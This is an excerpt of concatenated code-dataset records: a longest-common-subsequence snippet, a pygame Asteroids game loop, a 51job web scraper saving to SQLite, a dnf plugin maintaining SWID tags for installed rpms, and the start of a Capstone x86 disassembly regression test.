t[i][j] = max(t[i-1][j], t[i][j-1])\n\n minDeltion = n - t[m][n] # if deletion is minimum then length of string is maximum\n # so length of original string - longest palindromic subsequence = Min no of deletions\n return minDeltion\n\nX= \"agbcba\"\nm = len(X)\n\nY = \"\".join(reversed(X))\nn = len(Y)\nt = [[-1 for j in range(m+1)] for i in range(n+1)]\n\nprint(minDeletions(X,Y,n,m))","sub_path":"Longest Common Subsequence/Problem7.py","file_name":"Problem7.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505670876","text":"import pygame # Main Pygame Logic\r\n\r\nimport logging\r\n\r\nfrom Asteroids import Attributes, Menus, Assets, Logic\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\nfile_handler = logging.FileHandler(\"log.txt\", mode='w')\r\nfile_handler.setFormatter(formatter)\r\nfile_handler.setLevel(logging.DEBUG)\r\n\r\nstream_handler = logging.StreamHandler()\r\nstream_handler.setFormatter(formatter)\r\n\r\n\r\nclass States:\r\n QUIT = 0\r\n MAIN_MENU = 1\r\n START_GAME = 2\r\n IN_GAME = 3\r\n PAUSED = 4\r\n GAME_OVER = 5\r\n\r\n\r\nclass Environment:\r\n\r\n def get_logger(self, logger_name):\r\n log = logging.getLogger(logger_name)\r\n log.setLevel(logging.DEBUG)\r\n stream_handler.setLevel(self.attributes.game.log_level)\r\n log.addHandler(file_handler)\r\n log.addHandler(stream_handler)\r\n return log\r\n\r\n def __init__(self, game_attributes, log_level=logging.ERROR):\r\n # Logging Initialization\r\n stream_handler.setLevel(log_level)\r\n\r\n self.log = logging.getLogger(\"ENV\")\r\n self.log.setLevel(log_level)\r\n self.log.addHandler(file_handler)\r\n self.log.addHandler(stream_handler)\r\n\r\n self.attributes = Attributes.Attributes(game_attributes)\r\n self.attributes.game.name = \"Asteroids - Developed by Nolan Emerson\"\r\n self.attributes.game.log_level = log_level\r\n self.state = None\r\n self.screen = None\r\n\r\n self.asteroids = []\r\n self.player = None\r\n\r\n pygame.init()\r\n self.clock = pygame.time.Clock()\r\n\r\n def init(self):\r\n log = self.get_logger(\"ENV:INIT\")\r\n\r\n log.info(\"Creating Window\")\r\n self.screen = pygame.display.set_mode(self.attributes.game.resolution)\r\n log.info(\"Setting Window Caption\")\r\n pygame.display.set_caption(self.attributes.game.name)\r\n\r\n def entry_point(self):\r\n log = self.get_logger(\"ENV:ENTR\")\r\n\r\n log.info(\"Initializing Game Environment\")\r\n self.init()\r\n self.state = States.MAIN_MENU\r\n log.info(\"Starting Main Loop\")\r\n self.main_loop()\r\n\r\n def no_menus(self):\r\n log = self.get_logger(\"ENV:ENTR\")\r\n\r\n log.info(\"Initializing Game Environment\")\r\n self.init()\r\n log.info(\"Resetting Game Environment\")\r\n self.reset()\r\n log.info(\"Starting Game Loop\")\r\n self.game_loop()\r\n\r\n def main_loop(self):\r\n log = self.get_logger(\"ENV:MAIN\")\r\n\r\n run = True\r\n while run:\r\n\r\n # pygame event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n # Quit Game\r\n run = False\r\n\r\n log.debug(\"Firing State\")\r\n # State Launcher\r\n if self.state == States.MAIN_MENU:\r\n log.debug(\"State: MAIN MENU\")\r\n # Display Main Menu\r\n self.state = Menus.main(self)\r\n\r\n elif self.state == States.START_GAME:\r\n log.debug(\"State: START GAME\")\r\n # Reset Game Space\r\n self.reset()\r\n\r\n # Start Game\r\n self.state = States.IN_GAME\r\n\r\n elif self.state == States.IN_GAME:\r\n log.debug(\"State: IN GAME\")\r\n # Continue Game\r\n self.state = self.game_loop()\r\n\r\n elif self.state == States.PAUSED:\r\n log.debug(\"State: PAUSED\")\r\n log.info(\"Game Paused\")\r\n # Display Pause Menu\r\n self.state = Menus.pause(self)\r\n\r\n elif self.state == States.GAME_OVER:\r\n log.debug(\"State: GAME OVER\")\r\n # Display Game Over Menu\r\n self.state = Menus.game_over(self)\r\n\r\n elif self.state == States.QUIT:\r\n log.debug(\"State: QUIT\")\r\n log.info(\"Quitting Game\")\r\n run = False\r\n\r\n self.clock.tick(self.attributes.game.tick_rate)\r\n\r\n log.info(\"Quitting Window\")\r\n pygame.quit()\r\n\r\n def reset(self):\r\n log = self.get_logger(\"ENV:REST\")\r\n\r\n log.info(\"Resetting Game Environment\")\r\n self.asteroids = []\r\n self.player = Assets.PC.Ship.default(self)\r\n\r\n def game_loop(self):\r\n log = self.get_logger(\"ENV:GAME\")\r\n\r\n log.info(\"Entering/Re-Entering Game Loop\")\r\n while True:\r\n\r\n # pygame event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n log.debug(\"Handling Pygame Event: QUIT\")\r\n # Quit Game\r\n return States.QUIT\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n log.debug(\"Player Pausing\")\r\n # Pause Game\r\n return States.PAUSED\r\n if event.key == pygame.K_SPACE:\r\n log.debug(\"Player Shooting\")\r\n # Make Player Shoot\r\n self.player.shoot_missile()\r\n\r\n # Logging\r\n if event.key == pygame.K_w:\r\n log.debug(\"Player Start Moving\")\r\n if event.key == pygame.K_a:\r\n log.debug(\"Player Start Rotate Left\")\r\n if event.key == pygame.K_d:\r\n log.debug(\"Player Start Rotate Right\")\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_w:\r\n log.debug(\"Player Stop Moving\")\r\n if event.key == pygame.K_a:\r\n log.debug(\"Player Stop Rotate Left\")\r\n if event.key == pygame.K_d:\r\n log.debug(\"Player Stop Rotate Right\")\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n # Turn Player Left\r\n self.player.rotate(self.player.Direction.LEFT)\r\n if keys[pygame.K_d]:\r\n # Turn Player Right\r\n self.player.rotate(self.player.Direction.RIGHT)\r\n if keys[pygame.K_w]:\r\n # Move Player Forward\r\n self.player.move_forward()\r\n\r\n # Game Logic Here\r\n if Logic.tick(self) == States.GAME_OVER:\r\n log.info(\"Game Over\")\r\n return States.GAME_OVER\r\n\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Render Here\r\n Logic.render(self)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.attributes.game.tick_rate)\r\n","sub_path":"Asteroids/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179587026","text":"from bs4 import BeautifulSoup\nimport xlwt\nimport urllib.request,urllib.error\nimport re\nimport sqlite3\nfrom urllib import parse\nfrom lxml import etree\n# 页面搜索路径:https://search.51job.com/list/010000,000000,0000,00,9,99,Java,2,1.html\n\n# kw = input(\"请输入你要搜索的关键字:\")\n# kw = input('输入想要选择的职位:')\n# keyword = parse.quote(parse.quote(kw))\n# pageNum = 1\n\ndef main():\n kw = input('输入想要选择的职位:')\n keyword = parse.quote(parse.quote(kw))\n # savepath = 'java.xls'\n\n datalist = getData(keyword)\n # saveData(datalist,savepath)\n dbpath = \"51job2.db\"\n saveData2DB(datalist,dbpath)\n\n\ndef getLink(html):\n linklist = []\n # html = open(nhtml, \"r\")\n bs = BeautifulSoup(html, \"html.parser\")\n scr = str(bs.find_all('script'))\n # print(scr)\n findLink = re.compile(r'\"job_href\":\"(.*?)\",')\n links = re.findall(findLink, scr)\n for link in links:\n link = link.replace('\\\\', '')\n linklist.append(link)\n # print(link)\n\n return linklist\ndef askURL(url):\n head = { #模拟浏览器头部信息\n \"User-Agent\": \"Mozilla / 5.0(Windows NT 10.0;Win64;x64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 85.0.4183.83Safari / 537.36\"\n }\n\n #用户代理,告诉豆瓣服务器,我们是什么类型的机器,告诉浏览器我们可以接收什么水平的浏览器\n request = urllib.request.Request(url,headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"gbk\",\"ignore\")\n # print(html)\n\n except urllib.error.URLError as e:\n if hasattr(e,\"code\"):\n print(e.code)\n\n if hasattr(e,\"reason\"):\n print(e.reason)\n\n return html\n\ndef getData(keyword):\n datalist = []\n for i in range(1,16):\n url = \"https://search.51job.com/list/010000,000000,0000,00,9,99,\" + keyword + \",2,\" + str(i) + \".html\"\n html = askURL(url)\n linklist = getLink(html)\n for s in linklist:\n # if s == 'http://h3c.51job.com/jobdes.html?jobid=120663783':\n # continue\n # print(s)\n try:\n html = askURL(s)\n bs = BeautifulSoup(html, \"html.parser\")\n data = []\n jobName = bs.select(\"div.cn > h1\")[0]['title']\n data.append(jobName)\n salary = bs.select('div.cn > strong')[0].text\n data.append(salary)\n location = bs.select('div.cn > p.cname > a.catn')[0]['title']\n data.append(location)\n if len(data) < 3:\n data.append('暂无')\n datalist.append(data)\n except:\n print(s,'大概率是调到公司官网了所以定位不到元素')\n else:\n print(s,'正常捕获')\n # except:\n # print('数组越界!!')\n\n\n\n print('数组长度为:',len(datalist))\n return datalist\n\n\ndef saveData(datalist,savepath):\n print(\"save....\")\n book = xlwt.Workbook(encoding=\"utf-8\",style_compression=0) # 创建book对象\n sheet = book.add_sheet('51Job',cell_overwrite_ok=True) # 创建工作表\n col = ('职位名称',\"薪水\",\"公司名称\")\n for i in range(0,3):\n sheet.write(0,i,col[i]) #列名\n for i in range(len(datalist)):\n print(\"第%d条\"%(i+1))\n data = datalist[i]\n for j in range(0,3):\n sheet.write(i+1,j,data[j])\n\n book.save(savepath)\ndef init_db(dbpath):\n sql = '''\n create table bigdata\n (\n id integer primary key autoincrement,\n jobname text,\n salary text,\n company text\n )\n ''' #创建数据表\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n conn.close()\ndef saveData2DB(datalist,dbpath):\n # init_db(dbpath)\n conn = sqlite3.connect(dbpath)\n cur = conn.cursor()\n\n for data in datalist:\n for index in range(len(data)):\n # if index == 4 or index == 5:\n # continue\n data[index] = '\"'+data[index]+'\"'\n sql = '''\n insert into bigdata (\n jobname,salary,company)\n values (%s)'''%\",\".join(data)\n print(sql)\n cur.execute(sql)\n conn.commit()\n\n cur.close()\n conn.close()\nif __name__ == \"__main__\":\n main()\n print(\"爬取完毕\")\n # init_db('51job2.db')\n # askURL(\"https://jobs.51job.com/beijing-hdq/112159887.html?s=01&t=0\")","sub_path":"Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"554837680","text":"\nfrom dnf.cli import commands\n\nimport platform\n\nfrom dnf import Plugin, rpm\nfrom dnfpluginscore import logger\nfrom subprocess import run\nfrom os import path, makedirs, environ, unlink, listdir, rmdir, symlink\nimport re\nfrom rpm2swidtag import repodata\nfrom rpm2swidtag.rpm import get_nevra, get_checksum\nfrom glob import iglob\n\nNAME = \"swidtags\"\n\nSWIDTAG_DIR_GEN = \"var/lib/swidtag\"\nSWIDTAG_DIR_DOWNLOAD = \"usr/lib/swidtag\"\nSWIDTAGS_D = \"etc/swid/swidtags.d\"\n\nclass swidtagsCommand(commands.Command):\n\taliases = [ NAME ]\n\tsummary = \"Maintain SWID tags for installed rpms\"\n\n\tplugin = None\n\n\tdef __init__(self, cli):\n\t\tsuper(swidtagsCommand, self).__init__(cli)\n\t\t# waiting for API: https://bugzilla.redhat.com/show_bug.cgi?id=1678176\n\t\t#pylint: disable=protected-access\n\t\tfor p in self.base._plugins.plugins:\n\t\t\tif p.name == NAME:\n\t\t\t\tself.plugin = p\n\t\t\t\tbreak\n\t\tif not self.plugin:\n\t\t\tlogger.error(\"Internal error: cannot find the plugin from command.\")\n\t\t\treturn\n\n\tdef configure(self):\n\t\tself.cli.demands.available_repos = True\n\t\tself.cli.demands.sack_activation = True\n\t\tself.cli.demands.resolving = False\n\t\tself.cli.demands.root_user = True\n\n\tdef set_argparser(self, parser):\n\t\tparser.add_argument(\"swidtagscmd\", nargs=1, choices=[\"sync\", \"regen\", \"purge\"], help=\"\"\"\nsync for installed rpms, fetch SWID tags from repository metadata or generate them locally\nregen synonym to sync\npurge remove all SWID tags that were locally-generated by the plugin\n\"\"\"\n\t\t)\n\n\tdef run(self):\n\t\tif self.opts.swidtagscmd[0] in ( \"purge\", \"sync\", \"regen\" ):\n\t\t\tself.plugin.purge_generated_dir()\n\t\t\tself.plugin.purge_generated_symlink()\n\t\telse:\n\t\t\tprint(\"dnf swidtags [sync | purge]\")\n\n\t\tif self.opts.swidtagscmd[0] in ( \"sync\", \"regen\" ):\n\t\t\tts = rpm.transaction.initReadOnlyTransaction(root=self.base.conf.installroot)\n\t\t\tpkgs = []\n\t\t\tfor p in ts.dbMatch():\n\t\t\t\t# Filter out imported GPG keys\n\t\t\t\tif p[\"arch\"]:\n\t\t\t\t\tpkgs.append(p)\n\n\t\t\tdirs = {}\n\t\t\tfor r in self.base.repos.iter_enabled():\n\t\t\t\tif not hasattr(r, \"get_metadata_path\"):\n\t\t\t\t\tcontinue\n\t\t\t\tfile = r.get_metadata_path(self.plugin.METADATA_TYPE)\n\t\t\t\tif not file or file == \"\":\n\t\t\t\t\tcontinue\n\t\t\t\ts = repodata.Swidtags(None, file)\n\t\t\t\ttags = s.tags_for_rpm_packages(pkgs)\n\n\t\t\t\tremaining_pkgs = []\n\t\t\t\tfor p in pkgs:\n\t\t\t\t\tif p not in tags:\n\t\t\t\t\t\tremaining_pkgs.append(p)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tfound = False\n\t\t\t\t\tfor t in tags[p]:\n\t\t\t\t\t\tlogger.debug(\"Retrieved SWID tag from repodata for %s: %s\", get_nevra(p), t.get_tagid())\n\t\t\t\t\t\tx = t.save_to_directory(self.plugin.dir_downloaded)\n\t\t\t\t\t\tdirs[x[0]] = True\n\t\t\t\t\t\tfound = True\n\t\t\t\t\tif not found:\n\t\t\t\t\t\tremaining_pkgs.append(p)\n\n\t\t\t\tpkgs = remaining_pkgs\n\n\t\t\tfor d in dirs:\n\t\t\t\tself.plugin.create_swidtags_d_symlink(path.basename(d))\n\n\t\t\tif len(pkgs) > 0:\n\t\t\t\trun_ret = self.plugin.run_rpm2swidtag_for([ get_nevra(p) for p in pkgs ])\n\t\t\t\tif run_ret == 0:\n\t\t\t\t\tpkgs_missing = {}\n\t\t\t\t\tfor p in pkgs:\n\t\t\t\t\t\tpkgs_missing[get_checksum(p)] = p\n\t\t\t\t\tfor f in iglob(path.join(self.plugin.dir_generated, \"*-rpm-*.swidtag\")):\n\t\t\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\t\t\tif m and m.group(1) in pkgs_missing:\n\t\t\t\t\t\t\tdel pkgs_missing[m.group(1)]\n\t\t\t\t\tfor p in pkgs_missing.values():\n\t\t\t\t\t\tlogger.warning(\"The SWID tag for rpm %s should have been generated but could not be found\", get_nevra(p))\n\t\t\t\tif run_ret == -2:\n\t\t\t\t\tlogger.warning(\"The rpm2swidtag_command not configured for the %s plugin.\\nSWID tags not generated locally for %d packages.\", NAME, len(pkgs))\n\n\nclass swidtags(Plugin):\n\n\tname = NAME\n\tgenerated_dirname = \"rpm2swidtag-generated\"\n\n\tMETADATA_TYPE = \"swidtags\"\n\n\tdef __init__(self, base, cli):\n\t\tsuper().__init__(base, cli)\n\t\tself.conf = None\n\t\tself.install_set = None\n\t\tself.remove_set = None\n\t\tself.remove_set_checksum = {}\n\t\tself.dir_generated = path.join(base.conf.installroot, SWIDTAG_DIR_GEN, self.generated_dirname)\n\t\tself.dir_downloaded = path.join(base.conf.installroot, SWIDTAG_DIR_DOWNLOAD)\n\t\tself.swidtags_d = path.join(base.conf.installroot, SWIDTAGS_D)\n\t\tself.ts = None\n\t\tif cli:\n\t\t\tcli.register_command(swidtagsCommand)\n\n\tdef config(self):\n\t\tsuper(swidtags, self).config()\n\t\tself.conf = self.read_config(self.base.conf)\n\t\tDEFAULTS = { \"main\": {\n\t\t\t}\n\t\t}\n\t\tfor s in DEFAULTS:\n\t\t\tif not self.conf.has_section(s):\n\t\t\t\ttry:\n\t\t\t\t\tself.conf.addSection(s)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tself.conf.add_section(s)\n\t\t\tfor o in DEFAULTS[s]:\n\t\t\t\tif not self.conf.has_option(s, o):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.conf.setValue(s, o, DEFAULTS[s][o])\n\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\tself.conf.set(s, o, DEFAULTS[s][o])\n\n\t\tfor repo in self.base.repos.iter_enabled():\n\t\t\tif hasattr(repo, \"add_metadata_type_to_download\"):\n\t\t\t\tlogger.debug(\"Will ask for SWID tags download for %s\", str(repo.baseurl))\n\t\t\t\trepo.add_metadata_type_to_download(self.METADATA_TYPE)\n\n\tdef resolved(self):\n\t\tself.install_set = self.base.transaction.install_set\n\t\tself.remove_set = self.base.transaction.remove_set\n\t\tfor p in self.remove_set:\n\t\t\tself.remove_set_checksum[p] = self.get_nevra_checksum(str(p), verbose=False)\n\n\tdef transaction(self):\n\t\tremove_packages = {}\n\t\tfor p in self.remove_set:\n\t\t\tif p not in self.remove_set_checksum:\n\t\t\t\tlogger.warning(\"Could not identify checksum for %s, potential SWID tag will not be removed\", p)\n\t\t\t\tcontinue\n\t\t\tremove_packages[self.remove_set_checksum[p]] = True\n\t\tif len(remove_packages) > 0:\n\t\t\tfor f in iglob(path.join(self.base.conf.installroot, SWIDTAGS_D, \"*\", \"*-rpm-*.swidtag\")):\n\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\tif not m:\n\t\t\t\t\tcontinue\n\t\t\t\tif m.group(1) in remove_packages:\n\t\t\t\t\tself.remove_file(f)\n\n\t\tdownloaded_swidtags = {}\n\t\tpackages_in_repos = { None: [] }\n\t\tdirs = {}\n\n\t\tfor i in self.install_set:\n\t\t\ttry:\n\t\t\t\tchecksum = self.get_nevra_checksum(str(i), verbose=False)\n\t\t\t\tif not checksum:\n\t\t\t\t\tlogger.warning(\"No installed rpm found for package %s, will not sync SWID tag.\", str(i) )\n\t\t\t\t\tcontinue\n\n\t\t\t\tr = i.repo\n\t\t\t\tif r not in downloaded_swidtags:\n\t\t\t\t\tdownloaded_swidtags[r] = None\n\t\t\t\t\tif hasattr(r, \"get_metadata_path\"):\n\t\t\t\t\t\tfile = r.get_metadata_path(self.METADATA_TYPE)\n\t\t\t\t\t\tif file and file != \"\":\n\t\t\t\t\t\t\tdownloaded_swidtags[r] = repodata.Swidtags(None, file)\n\t\t\t\tif downloaded_swidtags[r]:\n\t\t\t\t\tif r not in packages_in_repos:\n\t\t\t\t\t\tpackages_in_repos[r] = []\n\t\t\t\t\tpackages_in_repos[r].append((i, checksum))\n\t\t\t\t\tcontinue\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\tpackages_in_repos[None].append((i, checksum))\n\n\t\tfor r in packages_in_repos:\n\t\t\tif not r:\n\t\t\t\tcontinue\n\t\t\ttags = downloaded_swidtags[r].tags_for_repo_packages(packages_in_repos[r])\n\t\t\tfor p in tags:\n\t\t\t\tfound = False\n\t\t\t\tfor t in tags[p]:\n\t\t\t\t\tlogger.debug(\"Retrieved SWID tag from repodata for %s: %s\", p[0], t.get_tagid())\n\t\t\t\t\tx = t.save_to_directory(self.dir_downloaded)\n\t\t\t\t\tdirs[x[0]] = True\n\t\t\t\t\tfound = True\n\t\t\t\tif not found:\n\t\t\t\t\tpackages_in_repos[None].append(p)\n\n\t\tfor d in dirs:\n\t\t\tself.create_swidtags_d_symlink(path.basename(d))\n\n\t\tif len(packages_in_repos[None]) > 0:\n\t\t\tp_names = [ str(p[0]) for p in packages_in_repos[None]]\n\t\t\tif self.run_rpm2swidtag_for(p_names) == 0:\n\t\t\t\tpkgs_missing = {}\n\t\t\t\tfor p in packages_in_repos[None]:\n\t\t\t\t\tpkgs_missing[p[1]] = p[0]\n\t\t\t\tfor f in iglob(path.join(self.dir_generated, \"*-rpm-*.swidtag\")):\n\t\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\t\tif m and m.group(1) in pkgs_missing:\n\t\t\t\t\t\tdel pkgs_missing[m.group(1)]\n\t\t\t\tfor p in pkgs_missing.values():\n\t\t\t\t\tlogger.warning(\"The SWID tag for rpm %s should have been generated but could not be found\", str(p))\n\n\tdef remove_file(self, file):\n\t\ttry:\n\t\t\tunlink(file)\n\t\texcept OSError as e:\n\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", file, e)\n\n\tdef purge_generated_dir(self):\n\t\tif not path.isdir(self.dir_generated):\n\t\t\treturn\n\t\tcount = 0\n\t\tfor f in listdir(self.dir_generated):\n\t\t\ttry:\n\t\t\t\tunlink(path.join(self.dir_generated, f))\n\t\t\t\tcount += 1\n\t\t\texcept OSError as e:\n\t\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", f, e)\n\t\ttry:\n\t\t\trmdir(self.dir_generated)\n\t\texcept OSError:\n\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", self.dir_generated, e)\n\t\tif count > 0:\n\t\t\tlogger.debug(\"Removed %d generated files from %s\", count, self.dir_generated)\n\n\tdef purge_generated_symlink(self):\n\t\tsymlink_path = path.join(self.swidtags_d, self.generated_dirname)\n\t\tif not path.islink(symlink_path):\n\t\t\treturn\n\t\tself.remove_file(symlink_path)\n\n\tdef create_generated_dir(self):\n\t\tif not path.isdir(self.dir_generated):\n\t\t\tmakedirs(self.dir_generated)\n\n\tdef create_download_dir(self, dirname):\n\t\tdirname = path.join(self.dir_downloaded, dirname)\n\t\tif not path.isdir(dirname):\n\t\t\tmakedirs(dirname)\n\n\tdef create_swidtags_d_symlink(self, basename=None):\n\t\tif basename:\n\t\t\ttarget = path.join(SWIDTAG_DIR_DOWNLOAD, basename)\n\t\telse:\n\t\t\tbasename = self.generated_dirname\n\t\t\ttarget = path.join(SWIDTAG_DIR_GEN, basename)\n\t\tif not path.isdir(self.swidtags_d):\n\t\t\tmakedirs(self.swidtags_d)\n\t\tsrc = path.join(self.swidtags_d, basename)\n\t\tif not path.islink(src):\n\t\t\tsymlink(path.join(\"../../..\", target), src)\n\n\tdef run_rpm2swidtag_for(self, pkgs):\n\t\tif not pkgs or len(pkgs) < 1:\n\t\t\treturn -1\n\t\thostname = platform.uname()[1]\n\t\ttry:\n\t\t\trpm2swidtag_command = self.conf.get(\"main\", \"rpm2swidtag_command\")\n\t\texcept KeyError:\n\t\t\treturn -2\n\t\texcept Exception as e:\n\t\t\tif e.__class__.__name__ == \"NoOptionError\":\n\t\t\t\treturn -2\n\t\t\traise e\n\t\tlogger.debug(\"Running %s for %s ...\", rpm2swidtag_command, pkgs)\n\t\tenv = { \"_RPM2SWIDTAG_RPMDBPATH\": path.join(self.base.conf.installroot, \"usr/lib/sysimage/rpm\") }\n\t\tif not path.isdir(env[\"_RPM2SWIDTAG_RPMDBPATH\"]):\n\t\t\tenv[\"_RPM2SWIDTAG_RPMDBPATH\"] = path.join(self.base.conf.installroot, \"var/lib/rpm\")\n\t\tif \"PYTHONPATH\" in environ:\n\t\t\tenv[\"PYTHONPATH\"] = environ[\"PYTHONPATH\"]\n\t\tret = run(rpm2swidtag_command.split() + [\"--tag-creator\", hostname, \"--output-dir\", path.join(self.dir_generated, \".\")] + pkgs,\n\t\t\tenv=env, check=False).returncode\n\t\tself.create_generated_dir()\n\t\tself.create_swidtags_d_symlink()\n\t\treturn ret\n\n\tdef get_nevra_checksum(self, nevra, verbose=True):\n\t\tif not self.ts:\n\t\t\tts = rpm.transaction.initReadOnlyTransaction(root=self.base.conf.installroot)\n\t\trpms = ( ts.dbMatch(2, str(nevra)) )\n\t\tif len(rpms) > 1:\n\t\t\tif verbose:\n\t\t\t\tlogger.warning(\"Multiple rpms %s found installed for package %s.\", str(rpms), str(nevra))\n\t\t\treturn None\n\t\tfor r in rpms:\n\t\t\tchecksum = get_checksum(r)\n\t\t\tif checksum:\n\t\t\t\treturn checksum\n\t\t\tif verbose:\n\t\t\t\tlogger.warning(\"No checksum found for rpm %s.\", str(nevra))\n\t\treturn None\n","sub_path":"lib/dnf-plugins/swidtags.py","file_name":"swidtags.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298793049","text":"#!/usr/bin/env python\n\n# Capstone Python bindings, by Nguyen Anh Quynnh \nfrom __future__ import print_function\nimport sys\nfrom capstone import *\n\nall_tests = (\n # arch, mode, syntax, address, hexcode, expected output\n # issue 456 https://github.com/aquynh/capstone/issues/456\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfc16, b\"\\xE8\\x35\\x64\", \"call 0x604e\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_INTEL, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"call 0x6054\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"call 0x6054\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfc26, b\"\\xE9\\x35\\x64\", \"jmp 0x605e\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfff6, b\"\\x66\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x53946431\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_INTEL, 0x9123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0xe4b7642b\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x64e4b7642b\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xffe1, b\"\\x66\\xe8\\x35\\x64\\x93\\x53\", \"call 0x5394641c\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123ffe1, b\"\\x66\\xe8\\x35\\x64\", \"call 0x641a\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123ffe1, b\"\\x66\\xe9\\x35\\x64\", \"jmp 0x641a\"),\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xffe1, b\"\\x66\\xe9\\x35\\x64\\x93\\x53\", \"jmp 0x5394641c\"),\n\n # AT&T syntax\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfc16, b\"\\xE8\\x35\\x64\", \"callw 0x604e\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_ATT, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"callw 0x6054\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"callw 0x6054\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfc26, b\"\\xE9\\x35\\x64\", \"jmp 0x605e\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfff6, b\"\\x66\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x53946431\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_ATT, 0x9123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0xe4b7642b\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x649123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x64e4b7642b\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xffe1, b\"\\x66\\xe8\\x35\\x64\\x93\\x53\", \"calll 0x5394641c\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x649123ffe1, b\"\\x66\\xe8\\x35\\x64\", \"callw 0x641a\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x649123ffe1, b\"\\x66\\xe9\\x35\\x64\", \"jmp 0x641a\"),\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xffe1, b\"\\x66\\xe9\\x35\\x64\\x93\\x53\", \"jmp 0x5394641c\"),\n)\n\n_python3 = sys.version_info.major == 3\n\n\ndef to_hex(s):\n if _python3:\n return \" \".join(\"0x{0:02x}\".format(c) for c in s) # <-- Python 3 is OK\n else:\n return \" \".join(\"0x{0:02x}\".format(ord(c)) for c in s)\n\n\ndef str_syntax(syntax):\n slist = {\n 0: \"\",\n CS_OPT_SYNTAX_INTEL: \"intel\",\n CS_OPT_SYNTAX_ATT: \"att\",\n }\n\n return slist[syntax]\n\n\ndef str_arch_mode(a, m):\n amlist = {\n (CS_ARCH_X86, CS_MODE_16): \"X86-16bit\",\n (CS_ARCH_X86, CS_MODE_32): \"X86-32bit\",\n (CS_ARCH_X86, CS_MODE_64): \"X86-64bit\",\n }\n\n return amlist[(a, m)]\n\n\n# ## Test cs_disasm_quick()\ndef test_regression():\n for (arch, mode, syntax, address, code, expected_output) in all_tests:\n print(\"%s %s: %s = \" %(str_arch_mode(arch, mode), str_syntax(syntax), to_hex(code)), end=\"\"),\n md = Cs(arch, mode)\n if syntax != 0:\n 